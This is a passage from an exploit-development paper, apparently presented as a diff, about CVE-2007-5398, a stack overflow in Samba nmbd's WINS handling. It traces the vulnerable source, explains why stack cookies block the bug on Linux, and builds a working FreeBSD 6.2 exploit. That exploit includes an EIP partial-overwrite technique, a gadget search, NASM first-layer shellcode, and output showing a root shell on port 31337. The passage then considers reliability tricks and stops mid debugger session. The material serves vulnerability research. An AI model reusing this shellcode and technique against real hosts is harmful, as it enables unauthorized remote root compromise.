+ 981                 if((lo_packet = copy_packet(&packet)) == NULL)
+ 982                         return;
+ 983                 queue_packet(lo_packet);
+ 984         } else if (!send_packet(&packet)) {
+ 985                 DEBUG(0,(
+          "reply_netbios_packet: send_packet to IP %s port %d failed\n",
+ 986                         inet_ntoa(packet.ip),packet.port));
+ 987         }
+ 988 }
+ 989 
+--------------------------------------------
+
+Unfortunately, since we saw mention of stack cookies and checks, it appears
+that we can't just overwrite the saved eip and test if we have code 
+execution - indeed, running the exploit with too few registrations provide
+us with the message of:
+
+--------------------------------------------
+*** stack smashing detected ***: /usr/sbin/nmbd terminated
+--------------------------------------------
+
+This means that it's probable we'll have to see what we can get away with
+in the processing of send_packet(). send_packet() is located in 
+libsmb/nmblib.c
+
+Looking at send_packet(), we find the following:
+
+--------------------------------------------
+ 982 /*******************************************************************
+ 983  Send a packet_struct.
+ 984 ******************************************************************/
+ 985 
+ 986 BOOL send_packet(struct packet_struct *p)
+ 987 {
+ 988         char buf[1024];
+ 989         int len=0;
+ 990 
+ 991         memset(buf,'\0',sizeof(buf));
+ 992 
+ 993         len = build_packet(buf, p);
+ 994 
+ 995         if (!len)
+ 996                 return(False);
+ 997 
+ 998         return(send_udp(p->fd,buf,len,p->ip,p->port));
+ 999 }
+1000 
+--------------------------------------------
+
+The "char buf[1024];" looks interesting, and maybe useful. 
+
+Followed by the obvious:
+
+--------------------------------------------
+ 961 /*******************************************************************
+ 962  Linearise a packet.
+ 963 ******************************************************************/
+ 964 
+ 965 int build_packet(char *buf, struct packet_struct *p)
+ 966 {
+ 967         int len = 0;
+ 968 
+ 969         switch (p->packet_type) {
+ 970         case NMB_PACKET:
+ 971                 len = build_nmb(buf,p);
+ 972                 break;
+ 973 
+ 974         case DGRAM_PACKET:
+ 975                 len = build_dgram(buf,p);
+ 976                 break;
+ 977         }
+ 978 
+ 979         return len;
+ 980 }
+--------------------------------------------
+
+Followed by the call once again, to build_nmb():
+
+--------------------------------------------
+ 881 /*******************************************************************
+ 882  Build a nmb packet ready for sending.
+ 883 
+ 884  XXXX this currently relies on not being passed something that expands
+ 885  to a packet too big for the buffer. Eventually this should be
+ 886  changed to set the trunc bit so the receiver can request the rest
+ 887  via tcp (when that becomes supported)
+ 888 ******************************************************************/
+ 889 
+ 890 static int build_nmb(char *buf,struct packet_struct *p)
+ 891 {
+ 892         struct nmb_packet *nmb = &p->packet.nmb;
+ 893         unsigned char *ubuf = (unsigned char *)buf;
+ 894         int offset=0;
+ 895 
+ 896         /* put in the header */
+ 897         RSSVAL(ubuf,offset,nmb->header.name_trn_id);
+ 898         ubuf[offset+2] = (nmb->header.opcode & 0xF) << 3;
+ 899         if (nmb->header.response)
+ 900                 ubuf[offset+2] |= (1<<7);
+ 901         if (nmb->header.nm_flags.authoritative &&
+ 902                         nmb->header.response)
+ 903                 ubuf[offset+2] |= 0x4;
+ 904         if (nmb->header.nm_flags.trunc)
+ 905                 ubuf[offset+2] |= 0x2;
+ 906         if (nmb->header.nm_flags.recursion_desired)
+ 907                 ubuf[offset+2] |= 0x1;
+ 908         if (nmb->header.nm_flags.recursion_available &&
+ 909                         nmb->header.response)
+ 910                 ubuf[offset+3] |= 0x80;
+ 911         if (nmb->header.nm_flags.bcast)
+ 912                 ubuf[offset+3] |= 0x10;
+ 913         ubuf[offset+3] |= (nmb->header.rcode & 0xF);
+ 914 
+ 915         RSSVAL(ubuf,offset+4,nmb->header.qdcount);
+ 916         RSSVAL(ubuf,offset+6,nmb->header.ancount);
+ 917         RSSVAL(ubuf,offset+8,nmb->header.nscount);
+ 918         RSSVAL(ubuf,offset+10,nmb->header.arcount);
+ 919 
+ 920         offset += 12;
+ 921         if (nmb->header.qdcount) {
+ 922                 /* XXXX this doesn't handle a qdcount of > 1 */
+ 923                 offset += put_nmb_name((char *)ubuf,offset,
+                     &nmb->question.question_name);
+ 924                 RSSVAL(ubuf,offset,nmb->question.question_type);
+ 925                 RSSVAL(ubuf,offset+2,nmb->question.question_class);
+ 926                 offset += 4;
+ 927         }
+ 928 
+ 929         if (nmb->header.ancount)
+ 930                 offset += 
+                       put_res_rec((char *)ubuf,offset,nmb->answers,
+ 931                                 nmb->header.ancount);
+ 932 
+ 933         if (nmb->header.nscount)
+ 934                 offset += put_res_rec((char *)ubuf,offset,nmb->nsrecs,
+ 935                                 nmb->header.nscount);
+ 936 
+ 937         /*
+ 938          * The spec says we must put compressed name pointers
+ 939          * in the following outgoing packets :
+ 940          * NAME_REGISTRATION_REQUEST, NAME_REFRESH_REQUEST,
+ 941          * NAME_RELEASE_REQUEST.
+ 942          */
+ 943 
+ 944         if((nmb->header.response == False) &&
+ 945           ((nmb->header.opcode == NMB_NAME_REG_OPCODE) ||
+ 946           (nmb->header.opcode == NMB_NAME_RELEASE_OPCODE) ||
+ 947           (nmb->header.opcode == NMB_NAME_REFRESH_OPCODE_8) ||
+ 948           (nmb->header.opcode == NMB_NAME_REFRESH_OPCODE_9) ||
+ 949           (nmb->header.opcode == NMB_NAME_MULTIHOMED_REG_OPCODE)) &&
+ 950           (nmb->header.arcount == 1)) {
+ 951 
+ 952     offset += put_compressed_name_ptr(ubuf,offset,nmb->additional,12);
+ 953 
+ 954         } else if (nmb->header.arcount) {
+ 955             offset += put_res_rec((char *)ubuf,offset,nmb->additional,
+ 956                         nmb->header.arcount);
+ 957         }
+ 958         return(offset);
+ 959 }
+--------------------------------------------
+
+Following the call to put_res_rec(), we see:
+
+--------------------------------------------
+ 388 
+ 389 /*******************************************************************
+ 390  Put a resource record into a packet.
+ 391 ******************************************************************/
+ 392 
+ 393 static int put_res_rec(char *buf,int offset,struct res_rec *recs,
+            int count)
+ 394 {
+ 395         int ret=0;
+ 396         int i;
+ 397 
+ 398         for (i=0;i<count;i++) {
+ 399                 int l = put_nmb_name(buf,offset,&recs[i].rr_name);
+ 400                 offset += l;
+ 401                 ret += l;
+ 402                 RSSVAL(buf,offset,recs[i].rr_type);
+ 403                 RSSVAL(buf,offset+2,recs[i].rr_class);
+ 404                 RSIVAL(buf,offset+4,recs[i].ttl);
+ 405                 RSSVAL(buf,offset+8,recs[i].rdlength);
+ 406                 memcpy(buf+offset+10,recs[i].rdata,recs[i].rdlength);
+ 407                 offset += 10+recs[i].rdlength;
+ 408                 ret += 10+recs[i].rdlength;
+ 409         }
+ 410 
+ 411         return(ret);
+ 412 }
+ 413 
+--------------------------------------------
+
+And following up with put_nmb_name():
+
+--------------------------------------------
+ 279 /*******************************************************************
+ 280  Put a compressed nmb name into a buffer. Return the length of the
+ 281  compressed name.
+ 282 
+ 283  Compressed names are really weird. The "compression" doubles the
+ 284  size. The idea is that it also means that compressed names conform
+ 285  to the doman name system. See RFC1002.
+ 286 ******************************************************************/
+ 287 
+ 288 static int put_nmb_name(char *buf,int offset,struct nmb_name *name)
+ 289 {
+ 290         int ret,m;
+ 291         nstring buf1;
+ 292         char *p;
+ 293 
+ 294         if (strcmp(name->name,"*") == 0) {
+ 295                 /* special case for wildcard name */
+ 296                 put_name(buf1, "*", '\0', name->name_type);
+ 297         } else {
+ 298                 put_name(buf1, name->name, ' ', name->name_type);
+ 299         }
+ 300 
+ 301         buf[offset] = 0x20;
+ 302 
+ 303         ret = 34;
+ 304 
+ 305         for (m=0;m<MAX_NETBIOSNAME_LEN;m++) {
+ 306                 buf[offset+1+2*m] = 'A' + ((buf1[m]>>4)&0xF);
+ 307                 buf[offset+2+2*m] = 'A' + (buf1[m]&0xF);
+ 308         }
+ 309         offset += 33;
+ 310 
+ 311         buf[offset] = 0;
+ 312 
+ 313         if (name->scope[0]) {
+ 314                 /* XXXX this scope handling needs testing */
+ 315                 ret += strlen(name->scope) + 1;
+ 316        safe_strcpy(&buf[offset+1],name->scope,sizeof(name->scope))  ;
+ 317 
+ 318                 p = &buf[offset+1];
+ 319                 while ((p = strchr_m(p,'.'))) {
+ 320                         buf[offset] = PTR_DIFF(p,&buf[offset+1]);
+ 321                         offset += (buf[offset] + 1);
+ 322                         p = &buf[offset+1];
+ 323                 }
+ 324                 buf[offset] = strlen(&buf[offset+1]);
+ 325         }
+ 326 
+ 327         return(ret);
+ 328 }
+ 329 
+--------------------------------------------
+
+
+And put_name():
+
+--------------------------------------------
+ 262 /*************************************************************     **
+ 263  Put a netbios name, padding(s) and a name type into a 16 character 
+      buffer.
+ 264  name is already in DOS charset.
+ 265  [15 bytes name + padding][1 byte name type].
+ 266 **************************************************************     */
+ 267 
+ 268 void put_name(char *dest, const char *name, int pad, 
+                   unsigned int name_type     )
+ 269 {
+ 270         size_t len = strlen(name);
+ 271 
+ 272      memcpy(dest, name, (len < MAX_NETBIOSNAME_LEN) ? 
+                  len : MAX_NETBIOSN     AME_LEN - 1);
+ 273         if (len < MAX_NETBIOSNAME_LEN - 1) {
+ 274               memset(dest + len, pad, MAX_NETBIOSNAME_LEN - 1 - len);
+ 275         }
+ 276         dest[MAX_NETBIOSNAME_LEN - 1] = name_type;
+ 277 }
+ 278 
+--------------------------------------------
+
+So it appears with a large enough request, we can overflow the second 
+char buf[1024]; in send_packet(), but due to stack cookies that may not
+get us much.
+
+Indeed, after a bit of experimenting, it looks like this is not exploitable
+out of the box on Ubuntu, due to propolice/SSP, and the later code flow
+does not appear to provide us with a mechanism where we can write to other 
+memory we can control, unfortunately. That said, I may of missed something
+obvious, or I might not of understood something correctly. If anyone has 
+anything to the contrary, I would appreciate it.
+
+Since the majority of other popular Linux platforms support SSP, I
+decided to take a look at FreeBSD's CURRENT platform, and see if that would
+be vulnerable/exploitable, and by a quick objdump on the nmbd binary, it
+appears to be. I was quite disappointed to learn that after experimenting 
+with triggering the vulnerability, that it didn't appear to be exploitable,
+due to stack cookies. (At least, with my current knowledge and 
+understanding, and sans bugs in the stack cookie check failure).
+
+For what it's worth, apparently OpenBSD and DragonFly BSD both use SSP and
+other security mechanisms.. but I hardly ever do anything on *BSD work, 
+and don't overly care what they're doing (or lack thereof)
+
+--[ 5 - Writing an exploit for Samba Version 3.0.23c on FreeBSD 6.2
+
+--[ 5.1 - Verifying valid registration flags
+
+To correctly exploit the nmbd daemon, we'll need to control the stack 
+layout with precision. Reviewing how the data is laid out, we see that 
+the flags parameter is used with what the host registered with. Due to 
+potential restrictions, we need to validate what ranges are valid and can 
+be used. 
+
+By doing some quick grepping of the samba source code, we find the below 
+code which modifies the flags:
+
+--------------------------------------------
+nmbd_packets.c:
+
+uint16 get_nb_flags(char *buf)
+{
+        return ((((uint16)*buf)&0xFFFF) & NB_FLGMSK);
+}
+
+../include/nameserv.h:#define NB_FLGMSK 0xE0
+
+nmbd_winserver.c:
+void wins_process_name_registration_request(struct subnet_record *subrec,
+                                            struct packet_struct *p)
+{
+	...
+        if(registering_group_name && (question->name_type != 0x1c)) {
+                from_ip = *interpret_addr2("255.255.255.255");
+        }
+	...
+
+--------------------------------------------
+
+From the above, we see what the only certain bits set in the request flags 
+is valid, and depending on what those bits are, that they can modify the ip
+address associated with the register request. To keep things extremely 
+simple, we will stick with using 0x0000 as the flags, and work out whatever
+issues that brings us.
+
+--[ 5.2 - Ordering the stack data correctly
+
+Samba stores NMB registrations in the tdb[4] format, a database backend
+designed by the Samba team to prevent re-implementing the same code several
+times throughout Samba.
+
+Due to the mechanisms that tdb uses, the way that nmbd returns our
+registered flags and ip addresses are not necessarily in order that we
+registered them. Further analysis reveals that we force a particular 
+layout in order to exploit it correctly.
+
+Looking at how names are looked up, we see:
+
+--------------------------------------------
+nmbd_winsserver.c:
+
+static void process_wins_dmb_query_request(struct subnet_record *subrec,
+                                           struct packet_struct *p)
+{
+	...
+        fetch_all_active_wins_1b_names();
+	...
+
+void fetch_all_active_wins_1b_names(void)
+{
+        tdb_traverse(wins_tdb, fetch_1b_traverse_fn, NULL);
+}
+
+/***********************************************************************
+ Fetch all *<1b> names from the WINS db and store on the namelist.
+***********************************************************************/
+
+static int fetch_1b_traverse_fn(TDB_CONTEXT *tdb, TDB_DATA kbuf, TDB_DATA 
+                                dbuf, void *state)
+{
+        struct name_record *namerec = NULL;
+
+        if (kbuf.dsize != sizeof(unstring) + 1) {
+                return 0;
+        }
+
+        /* Filter out all non-1b names. */
+        if (kbuf.dptr[sizeof(unstring)] != 0x1b) {
+                return 0;
+        }
+
+        namerec = wins_record_to_name_record(kbuf, dbuf);
+        if (!namerec) {
+                return 0;
+        }
+
+        DLIST_ADD(wins_server_subnet->namelist, namerec);
+        return 0;
+}
+--------------------------------------------
+
+fetch_all_active_wins_1b_names() just calls tdb_traverse() with a call
+back function of fetch_1b_traverse_fn(), which adds it to a temporary name
+cache storage, at the top of a doubly linked list.
+
+Looking at tdb_traverse(), it calls tdb_traverse_internal(), which is
+where the majority of the work gets done. At this stage, it is probably 
+easier to look at how data gets stored to the database, which happens in
+tdb_store().
+
+--------------------------------------------
+/* store an element in the database, replacing any existing element
+   with the same key 
+
+   return 0 on success, -1 on failure
+*/
+int tdb_store(struct tdb_context *tdb, TDB_DATA key, TDB_DATA dbuf, 
+              int flag)
+{
+
+...
+
+/* find which hash bucket it is in */
+hash = tdb->hash_fn(&key);
+if (tdb_lock(tdb, BUCKET(hash), F_WRLCK) == -1)
+	return -1;
+
+...
+
+nmbd/nmbd_processlogon.c:tdb = tdb_open_log(lock_path("connections.tdb"),0,
+nmbd/nmbd_winsserver.c:   wins_tdb = tdb_open_log(lock_path("wins.tdb"), 0,
+                     TDB_DEFAULT|TDB_CLEAR_IF_FIRST, O_CREAT|O_RDWR, 0600);
+
+
+tdb_private.h:#define BUCKET(hash) ((hash) % tdb->header.hash_size)
+
+struct tdb_context *tdb_open(const char *name,int hash_size, int tdb_flags,
+      int open_flags, mode_t mode)
+
+...
+
+if (hash_size == 0)
+	hash_size = DEFAULT_HASH_SIZE;
+
+tdb_private.h:#define DEFAULT_HASH_SIZE 131        
+--------------------------------------------
+
+From this, we can see that we need to use the hash_fn() (which defaults to
+default_tdb_hash()) , and then we need to modulus the hash result by
+DEFAULT_HASH_SIZE. By generating names that hash to 130, we can put our 
+data in order on the stack, after every already existing 0x1b 
+registrations. Before exploitation, we need to see how many existing 0x1b 
+registrations exist, so that the stack can be overflowed correctly.
+
+This reminds me of the Algorithmic Complexity attacks, outlined
+here [5]. Not directly related, but still interesting none the less.
+
+--[ 5.3 - Code execution analysis
+
+By triggering the vulnerability and examining the stack layout, we see that
+saved eip can be partially overwritten, with two bytes. If we overwrite 
+once more, the top two bytes of eip will be the two flag bytes, and 
+overwrite the first argument to the function. After the overwrite the value
+of orig_packet, the nmbd code will index into it, to copy a 4 byte value, 
+as seen below.
+
+--------------------------------------------
+nmbd_packets.c, send_reply_packet():
+ 973         packet.fd = orig_packet->fd;
+--------------------------------------------
+
+So far in the analysis, a partial overwrite of the two least significant 
+bytes of eip seems to be the best course of action, as it's unlikely we can 
+put anything useful in the top two bytes (due to the flags). Causing an 
+overwrite of the least significant bytes with "D"'s, show:
+
+--------------------------------------------
+Program received signal SIGSEGV, Segmentation fault.
+0x08074444 in packet_is_for_wins_server ()
+(gdb) x/10i $eip
+0x8074444 <packet_is_for_wins_server+236>:     mov    0x400(%ebx),%eax
+0x807444a <packet_is_for_wins_server+242>:     mov    (%eax),%eax
+0x807444c <packet_is_for_wins_server+244>:     cmpl   $0x9,(%eax)
+0x807444f <packet_is_for_wins_server+247>:     jle    0x80743a1
+<packet_is_for_wins_server+73>
+0x8074455 <packet_is_for_wins_server+253>:     push   $0x1fa
+0x807445a <packet_is_for_wins_server+258>:     lea    0xfffd66ad(%ebx),%eax
+0x8074460 <packet_is_for_wins_server+264>:     push   %eax
+0x8074461 <packet_is_for_wins_server+265>:     lea    0xfffd6479(%ebx),%eax
+0x8074467 <packet_is_for_wins_server+271>:     push   %eax
+0x8074468 <packet_is_for_wins_server+272>:     push   $0xa
+(gdb) i r ebx
+ebx            0x0      0
+(gdb) i r  
+eax            0x1      1
+ecx            0x2834fd80       674561408
+edx            0x40     64
+ebx            0x0      0
+esp            0xbfbfe540       0xbfbfe540
+ebp            0x44440000       0x44440000
+esi            0x0      0
+edi            0x41414141       1094795585
+eip            0x8074444        0x8074444
+eflags         0x10282  66178
+cs             0x33     51
+ss             0x3b     59
+ds             0x3b     59
+es             0x3b     59
+fs             0x3b     59
+gs             0x1b     27
+--------------------------------------------
+
+We can see that we can completely control edi and to a lesser extent ebp.
+
+Looking at the disassembly of the applicable epilogue of the
+reply_netbios_packet() function, we see:
+
+--------------------------------------------
+.text:0806D0A0                 pop     edi
+.text:0806D0A1                 leave
+.text:0806D0A2                 retn
+--------------------------------------------
+
+To gain complete control of eip, we can look for a jmp edi or push edi ;
+ret. After some searching in 0x0807xxxx, a suitable instruction sequence 
+is found (via incredibly lame means.. but it worked :p): 
+
+--------------------------------------------
+freebsd62# objdump -d nmbd | egrep -i "^ 807.*57 c[23]"
+ 80728a4:       e8 57 c2 04 00          call   80beb00 <x_fclose>
+--------------------------------------------
+
+which translates into a push edi ; ret 0x04. By setting our last two bytes
+to 0x080728a5, we can get direct control:
+
+--------------------------------------------
+(gdb) r
+Starting program: /usr/local/sbin/nmbd -F -s smb.conf
+(no debugging symbols found)...(no debugging symbols found)...(no debugging
+symbols found)...(no debugging symbols found)...(no debugging symbols
+found)...(no debugging symbols found)...(no debugging symbols found)...(no
+debugging symbols found)...(no debugging symbols found)...(no debugging
+symbols found)...y
+
+Program received signal SIGSEGV, Segmentation fault.
+0x41414141 in ?? ()
+--------------------------------------------
+
+From this point of time, we need to get shellcode running correctly. 
+Thinking back to how the data is laid out ([2 byte flags, both null][4 byte 
+ip address]).. it's probably the best approach to write a custom decoder.
+
+--[ 5.4 - Shellcode
+
+As discussed above, a special decoder would be needed so what we can use
+generic shellcode available, as opposed to porting common shellcode to 
+account for 1/3 of the bytes being rubbish.
+
+After experimenting, I wrote a shellcode that would reconstruct 4 bytes, 
+then skip two bytes, then jump to the place where we re-constructed the 
+shellcode.
+
+Shellcode is as follows (nasm -f bin first_layer_sc.asm -o
+first_layer_sc.bin to compile.). At entry of the shellcode, edi points to
+our current eip.
+
+--------------------------------------------
+BITS 32
+
+%define tbnop add byte [eax],0x0	; 0x80 0x00 0x00
+
+_start:
+        add [eax], al		; two byte nulls, for flags.
+
+        cld			; reset direction flag
+        mov eax, edi            ; since our two byte nop dereferences [eax]
+				; we need a writable memory location.
+
+        tbnop			
+
+        mov esi, edi            ; ESI = source of encoded shellcode
+        nop
+
+        tbnop
+
+        add esi, byte 60        ; increment esi to start of real shellcode
+
+        tbnop
+
+        mov edi, esp            ; Place we're going to execute
+        nop
+
+        tbnop 
+
+        xor ecx, ecx
+        nop
+
+        tbnop
+
+        mov cl, byte 0x7e	; how many bytes we want to copy. Can copy up
+				; 126 bytes or so. This can be fixed if
+				; nessessacy
+        nop
+        tbnop
+
+.copier:
+        movsd
+        nop 
+        nop
+        tbnop
+
+        add esi, byte 0x02
+        tbnop
+
+        loopnz .copier
+.ready:
+        jmp esp
+--------------------------------------------
+
+For the second layer shellcode, we can use any shellcode we want. For
+additional flexibility, I have used the InlineEgg [6] package to
+allow for greater flexibility in the second layer shellcode. 
+
+Encoding the shellcode for registration packets is extremely straight 
+forward. Change the endian / ordering of 4 bytes and append 2 NULL bytes.
+
+Ideally, the second layer shellcode would encode the shell registration
+information over the existing socket / fd information, using the nmb 
+protocol.
+If it where a more useful exploit, it would be worth while expending the
+effort to write the required code.
+
+--[ 5.5 - Getting a shell
+
+By combining the above information, and determining where in the stack the
+shellcode lies, we can get a shell:
+
+--------------------------------------------
+[target machine]
+(gdb) shell rm /var/db/samba/wins.*
+(gdb) r
+Starting program: /usr/local/sbin/nmbd -F -s smb.conf
+(no debugging symbols found)...(no debugging symbols found)...(no debugging
+symbols found)...(no debugging symbols found)...(no debugging symbols
+found)...(no debugging symbols found)...(no debugging symbols found)...(no
+debugging symbols found)...(no debugging symbols found)...(no debugging
+symbols found)...
+Program received signal SIGTRAP, Trace/breakpoint trap.
+Cannot remove breakpoints because program is no longer writable.
+It might be running in another process.
+Further execution is probably impossible.
+0x28065af0 in ?? ()
+(gdb) # This happened because our nmbd executed a new program
+(gdb) c
+
+[attacking machine]
+$ python CVE-2007-5398.py --host 172.16.178.128 --target 0 
+Hit y if you want to test registration flags, otherwise just hit enter> 
+Existing registrations:  0
+Amount of registrations to reach EIP:  239
+Got 0 existing registrations. Hit any key to continue... 
+First layer of shellcode is 66 bytes long
+Second layer of shellcode is 246 bytes long
+Names: |==========================================================| 100.00
+Registering: |====================================================| 100.00
+stack left over: 
+Please hit enter to send final packet... 
+Attempting to connect to 172.16.178.128:31337
+ -------------------------------------------
+You are in luck; it appears to of worked... shell below.
+--
+# It worked
+# id
+uid=0(root) gid=0(wheel) groups=0(wheel), 5(operator)
+# uname -a
+FreeBSD freebsd62 6.2-RELEASE FreeBSD 6.2-RELEASE #0: Fri Jan 12 10:40:27 
+2007     root@dessler.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC  i386
+--------------------------------------------
+
+So, with a bunch of research and analysis, we're only part way there. It 
+would be nice to have a better place to return to. 
+
+--[ 5.6 - Making the exploit more reliable
+
+Currently, our exploit has two hard coded entries, the first of which is 
+the location of a sequence of code which uses edi to gain code execution 
+(so far, 0x080728a5 (for our current target of FreeBSD 6.2). Additionally, 
+it uses the exact location of the start of the shellcode. Due to various 
+reasons, the stack address can change easily for such an exact address, due 
+to reasons such as:
+
+ * Starting or restarting nmbd manually
+ * Differing environmental strings
+ * In later Linux 2.6 series, memory randomisation is enabled by default, 
+   for certain mappings.
+
+There are a couple of opportunities to make this exploit more reliable, 
+such as adding large nop sequences, or perhaps putting / finding some 
+suitable code elsewhere.
+
+The larger nop sequence may help, but 1/3 of the bytes are NULL / not 
+useful, so it is debatable. Additionally, this means if the range was 
+accurate, we have only a 2/3 chance of hitting a suitable nop sequence, as 
+opposed to outright crashing (as "\x00\x00" encodes to add [eax], al, and 
+since eax will be one (1) when the nop sequence is hit, it will crash.) So, 
+for the time being we will look for another place / way to gain reliable 
+execution control.
+
+--[ 5.6.1 - static .bss data
+
+While analysing this vulnerability, I noticed an interesting function that
+gets called when sending registration packets:
+
+--------------------------------------------
+nmbd/nmbd_winsserver.c:
+
+/*************************************************************************
+ Overwrite or add a given name in the wins.tdb.
+*************************************************************************/
+
+static BOOL store_or_replace_wins_namerec(const struct name_record *namerec
+                                          ,int tdb_flag)
+{
+        TDB_DATA key, data;
+        int ret;
+
+        if (!wins_tdb) {
+                return False;
+        }
+
+        key = name_to_key(&namerec->name);
+        data = name_record_to_wins_record(namerec);
+
+        if (data.dptr == NULL) {
+                return False;
+        }
+
+        ret = tdb_store(wins_tdb, key, data, tdb_flag);
+
+        SAFE_FREE(data.dptr);
+        return (ret == 0) ? True : False;
+}
+
+...
+
+/*************************************************************************
+ Create key. Key is UNIX codepage namestring (usually utf8 64 byte len) 
+ with 1 byte type.
+*************************************************************************/
+
+static TDB_DATA name_to_key(const struct nmb_name *nmbname)
+{
+        static char keydata[sizeof(unstring) + 1];
+        TDB_DATA key;
+
+        memset(keydata, '\0', sizeof(keydata));
+
+        pull_ascii_nstring(keydata, sizeof(unstring), nmbname->name);
+        strupper_m(keydata);
+        keydata[sizeof(unstring)] = nmbname->name_type;
+        key.dptr = keydata;
+        key.dsize = sizeof(keydata);
+
+        return key;
+}
+--------------------------------------------
+
+The most interesting about the above is the static char
+keydata[sizeof(unstring) + 1]; which gives us the ability to put upto 64
+bytes into a static location in the .bss. However, since NetBIOS names are
+15 chars long, there is still a lot of code that could be put here. Some
+information on small shellcodes to find things can be found here [7]
+
+name_to_key() is called from three locations in the code, with self
+explaining names (not including the above store_or_replace_wins_namerec():
+
+--------------------------------------------
+/*************************************************************************
+ Delete a given name in the tdb and remove the temporary malloc'ed data 
+ struct on the linked list.
+*************************************************************************/
+
+BOOL remove_name_from_wins_namelist(struct name_record *namerec)
+{
+
+...
+
+struct name_record *find_name_on_wins_subnet(const struct nmb_name *nmbname
+                                             ,BOOL self_only)
+{
+...
+
+--------------------------------------------
+
+Of interest is the store_or_replace_wins_namerec() which is called when 
+sending the registration packets to trigger the overflow. We may be able to
+send a suitable, short, shellcode that finds our loader shellcode in the
+stack (or, with more effort, on the heap, thus avoiding Openwall style
+non-executable stack patches).
+
+Being able to use this static location gives us some advantages over stack
+randomisation / changes. 
+
+Looking further into pull_ascii_nstring() we see that it does DOS code page
+mappings to UNIX code pages, especially relating to bytes with high bits
+installed. Unfortunately, it heavily mangles the input (via the translation
+phase), then performs an uppercase operation on the string. I experimented
+with the above restrictions and was not get anything working, but it went 
+over the length restriction. The idea worked on:
+
+ * push esp
+ * pop ebp
+ * push edi
+ * pop esp
+ * using pop to access the code we're executing
+ * using the charcase conversion to get 4 bytes with the most significant
+   bit set from 1 byte.
+ * using xor [edi+index], reg to modify the applicable code we're executing
+   ,then to do something equivilent to sub ebp, <offset> ; jmp ebp
+
+If anyone works out a suitable shellcode that fits in those restrictions, I
+would definately be interested in hearing from you. I suspect given more 
+time / motivation something would come up, and in hindsight would be a 
+"that's obvious" case. Additionally, we can control the contents of the top 
+two bytes of ebp, which may be useful in some way for coding the shellcode. 
+Possibly something like:
+
+ * push ebp
+ * inc esp ; skip over null byte
+ * inc esp 
+ * byte with high bit set that gets translated into a 0xc3 (ret
+   instruction)
+ * What two arbitrary bytes it executes has to be chosen carefully. A jmp
+   sled backwards may work, but certain data structures can not be modified
+   randomly as nmbd will crash before code execution takes place.
+
+Another potential static address we could use is the following:
+
+--------------------------------------------
+libsmb/nmblib.c:
+
+1123 static unsigned char sort_ip[4];
+1124 
+1125 /*********************************************************************
+1126  Compare two query reply records.
+1127 *********************************************************************/
+1128 
+1129 static int name_query_comp(unsigned char *p1, unsigned char *p2)
+1130 {
+1131         return matching_quad_bits(p2+2, sort_ip) - 
+                     matching_quad_bits(p1+2, sort_ip);
+1132 }
+1133 
+1134 /*********************************************************************
+1135  Sort a set of 6 byte name query response records so that the IPs that
+1136  have the most leading bits in common with the specified address come 
+      first.
+1137 *********************************************************************/
+1138 
+1139 void sort_query_replies(char *data, int n, struct in_addr ip)
+1140 {
+1141         if (n <= 1)
+1142                 return;
+1143 
+1144         putip(sort_ip, (char *)&ip);
+1145 
+1146         qsort(data, n, 6, QSORT_CAST name_query_comp);
+1147 }
+--------------------------------------------
+
+which is reachable from nmbd/nmbd_winsserver.c:
+
+--------------------------------------------
+1831 void send_wins_name_query_response(int rcode, struct packet_struct *p,
+1832                                           struct name_record *namerec)
+1833 {
+1834         char rdata[6];
+1835         char *prdata = rdata;
+1836         int reply_data_len = 0;
+1837         int ttl = 0;
+1838         int i;
+1839 
+1840         memset(rdata,'\0',6);
+1841 
+1842         if(rcode == 0) {
+1843                 ttl = (namerec->data.death_time != PERMANENT_TTL) ?  
+          namerec->data.death_time - p->timestamp : lp_max_wi     ns_ttl();
+1844 
+1845               /* Copy all known ip addresses into the return data. */
+1846               /* Optimise for the common case of one IP address so we
+                      don't need a malloc. */
+1847 
+1848                 if( namerec->data.num_ips == 1 ) {
+1849                         prdata = rdata;
+1850                 } else {
+1851                         if((prdata = (char *)
+                       SMB_MALLOC( namerec->data.num_ips * 6 )) == NULL) {
+1852          DEBUG(0,("send_wins_name_query_response: malloc fail !\n"));
+1853                                 return;
+1854                         }
+1855                 }
+1856 
+1857                 for(i = 0; i < namerec->data.num_ips; i++) {
+1858                     set_nb_flags(&prdata[i*6],namerec->data.nb_flags);
+1859                 putip((char *)&prdata[2+(i*6)], &namerec->data.ip[i]);
+1860                 }
+1861 
+1862                 sort_query_replies(prdata, i, p->ip);
+1863                 reply_data_len = namerec->data.num_ips * 6;
+1864         }
+1865 
+
+
+--------------------------------------------
+
+But I have not explored this path fully, but I don't think it would help 
+too much.
+
+After looking over what could be done with such restrictions, I started
+looking around the code to see if there was any easier mechanisms that 
+would give assistance in exploiting this issue reliably. I noticed a couple 
+of static buffers that could be useful, but they required debugging to be
+enabled to be exploited correctly - not exactly a good requirement for a 
+reliable exploit.
+
+--[ 5.6.2 - Memory leak
+
+During the initial process of attempting to replicate the issue, I noticed
+that nmbd would attempt to read from memory that we control - perhaps we 
+can find a memory leak / information disclosure that is useful. Starting 
+off with setting all normally NULL IP address to AABB, we see the first 
+crash:
+
+--------------------------------------------
+The program being debugged has been started already.
+Start it from the beginning? (y or n) y
+Starting program: /usr/local/sbin/nmbd -F -s smb.conf 
+Program received signal SIGSEGV, Segmentation fault.
+0x080adc67 in debug_nmb_res_rec ()
+(gdb) bt
+#0  0x080adc67 in debug_nmb_res_rec ()
+#1  0x080ae023 in debug_nmb_packet ()
+#2  0x0806d1f8 in reply_netbios_packet ()
+#3  0x080728a5 in write_browse_list ()
+Previous frame inner to this frame (corrupt stack?)
+(gdb) x/10i $eip
+0x80adc67 <debug_nmb_res_rec+47>:  mov    0x60(%edx),%ecx
+0x80adc6a <debug_nmb_res_rec+50>:  test   %ecx,%ecx
+0x80adc6c <debug_nmb_res_rec+52>:  je     0x80add89 <debug_nmb_res_rec+337>
+0x80adc72 <debug_nmb_res_rec+58>:  cmp    $0xffffff9c,%edx
+0x80adc75 <debug_nmb_res_rec+61>:  je     0x80add89 <debug_nmb_res_rec+337>
+0x80adc7b <debug_nmb_res_rec+67>:  cmp    $0x0,%ecx
+0x80adc7e <debug_nmb_res_rec+70>:  movl   $0x0,0xffffffe8(%ebp)
+0x80adc85 <debug_nmb_res_rec+77>:  jle    0x80add89 <debug_nmb_res_rec+337>
+0x80adc8b <debug_nmb_res_rec+83>:  mov    0x400(%ebx),%eax
+0x80adc91 <debug_nmb_res_rec+89>:  mov    %eax,0xffffffe0(%ebp)
+(gdb) i r edx ecx
+edx            0x41414242       1094795842
+ecx            0x42420000       1111621632
+(gdb) bt
